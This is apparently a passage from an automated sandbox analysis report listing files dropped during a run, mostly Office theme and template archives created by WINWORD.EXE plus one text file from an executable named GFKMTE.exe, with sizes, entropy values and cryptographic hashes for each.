                                                                                                                                                Size (bytes):31083
                                                                                                                                                Entropy (8bit):7.814202819173796
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                                                                                                                                MD5:89A9818E6658D73A73B642522FF8701F
                                                                                                                                                SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                                                                                                                                SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                                                                                                                                SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):46413
                                                                                                                                                Entropy (8bit):7.9071408623961394
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                                                                                                                                MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                                                                                                                                SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                                                                                                                                SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                                                                                                                                SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):43653
                                                                                                                                                Entropy (8bit):7.899157106666598
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                                                                                                                                MD5:DA3380458170E60CBEA72602FDD0D955
                                                                                                                                                SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                                                                                                                                SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                                                                                                                                SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):42788
                                                                                                                                                Entropy (8bit):7.89307894056
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                                                                                                                                MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                                                                                                                                SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                                                                                                                                SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                                                                                                                                SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):222992
                                                                                                                                                Entropy (8bit):7.994458910952451
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                                                                                                                                MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                                                                                                                                SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                                                                                                                                SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                                                                                                                                SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):276650
                                                                                                                                                Entropy (8bit):7.995561338730199
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                                                                                                                                MD5:84D8F3848E7424CBE3801F9570E05018
                                                                                                                                                SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                                                                                                                                SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                                                                                                                                SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):271273
                                                                                                                                                Entropy (8bit):7.995547668305345
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                                                                                                                                MD5:21437897C9B88AC2CB2BB2FEF922D191
                                                                                                                                                SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                                                                                                                                SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                                                                                                                                SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):261258
                                                                                                                                                Entropy (8bit):7.99541965268665
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                                                                                                                                MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                                                                                                                                SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                                                                                                                                SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                                                                                                                                SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):307348
                                                                                                                                                Entropy (8bit):7.996451393909308
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                                                                                                                                                MD5:0EBC45AA0E67CC435D0745438371F948
                                                                                                                                                SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                                                                                                                                SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                                                                                                                                SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):295527
                                                                                                                                                Entropy (8bit):7.996203550147553
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                                                                                                                                MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                                                                                                                                SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                                                                                                                                SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                                                                                                                                SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):230916
                                                                                                                                                Entropy (8bit):7.994759087207758
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                                                                                                                                MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                                                                                                                                SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                                                                                                                                SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                                                                                                                                SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):550906
                                                                                                                                                Entropy (8bit):7.998289614787931
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                                                                                                                                MD5:1C12315C862A745A647DAD546EB4267E
                                                                                                                                                SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                                                                                                                                SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                                                                                                                                SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):723359
                                                                                                                                                Entropy (8bit):7.997550445816903
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                                                                                                                                MD5:748A53C6BDD5CE97BD54A76C7A334286
                                                                                                                                                SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                                                                                                                                SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                                                                                                                                SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):640684
                                                                                                                                                Entropy (8bit):7.99860205353102
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                                                                                                                                MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                                                                                                                                SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                                                                                                                                SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                                                                                                                                SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):698244
                                                                                                                                                Entropy (8bit):7.997838239368002
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                                                                                                                                MD5:E29CE2663A56A1444EAA3732FFB82940
                                                                                                                                                SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                                                                                                                                SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                                                                                                                                SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):953453
                                                                                                                                                Entropy (8bit):7.99899040756787
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                                                                                                                                MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                                                                                                                                SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                                                                                                                                SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                                                                                                                                SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1065873
                                                                                                                                                Entropy (8bit):7.998277814657051
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                                                                                                                                MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                                                                                                                                SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                                                                                                                                SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                                                                                                                                SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1097591
                                                                                                                                                Entropy (8bit):7.99825462915052
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                                                                                                                                MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                                                                                                                                SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                                                                                                                                SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                                                                                                                                SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1310275
                                                                                                                                                Entropy (8bit):7.9985829899274385
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                                                                                                                                MD5:9C9F49A47222C18025CC25575337A965
                                                                                                                                                SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                                                                                                                                SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                                                                                                                                SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1766185
                                                                                                                                                Entropy (8bit):7.9991290831091115
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                                                                                                                                MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                                                                                                                                SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                                                                                                                                SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                                                                                                                                SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1881952
                                                                                                                                                Entropy (8bit):7.999066394602922
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                                                                                                                                MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                                                                                                                                SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                                                                                                                                SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                                                                                                                                SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2591108
                                                                                                                                                Entropy (8bit):7.999030891647433
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                                                                                                                                MD5:BEB12A0464D096CA33BAEA4352CE800F
                                                                                                                                                SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                                                                                                                                SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                                                                                                                                SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2527736
                                                                                                                                                Entropy (8bit):7.992272975565323
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                                                                                                                                MD5:F256ACA509B4C6C0144D278C7036B0A8
                                                                                                                                                SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                                                                                                                                SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                                                                                                                                SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3256855
                                                                                                                                                Entropy (8bit):7.996842935632312
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                                                                                                                                MD5:8867BDF5FC754DA9DA6F5BA341334595
                                                                                                                                                SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                                                                                                                                SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                                                                                                                                SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3417042
                                                                                                                                                Entropy (8bit):7.997652455069165
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                                                                                                                                MD5:749C3615E54C8E6875518CFD84E5A1B2
                                                                                                                                                SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                                                                                                                                SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                                                                                                                                SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1059
                                                                                                                                                Entropy (8bit):3.9051627621358747
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:FLJ+DW2SFFkFmMMLGId1L6AEJl7XpShhJKShe/Q0QK1++xNHSuVPnBdxv3n:FLJ+S3Mmd1L6ztMhEMOQ0Q+OuVjxvn
                                                                                                                                                MD5:BD4ED5E63E9EDFCE6BBF0770ED891550
                                                                                                                                                SHA1:990E5BC692E763957C72BC99D5FFD13B51B785FC
                                                                                                                                                SHA-256:9FF19D4A5A46A8D77A2898ADA4AB15324BFBF269A8D4BC6A3CA9A3321DDA0106
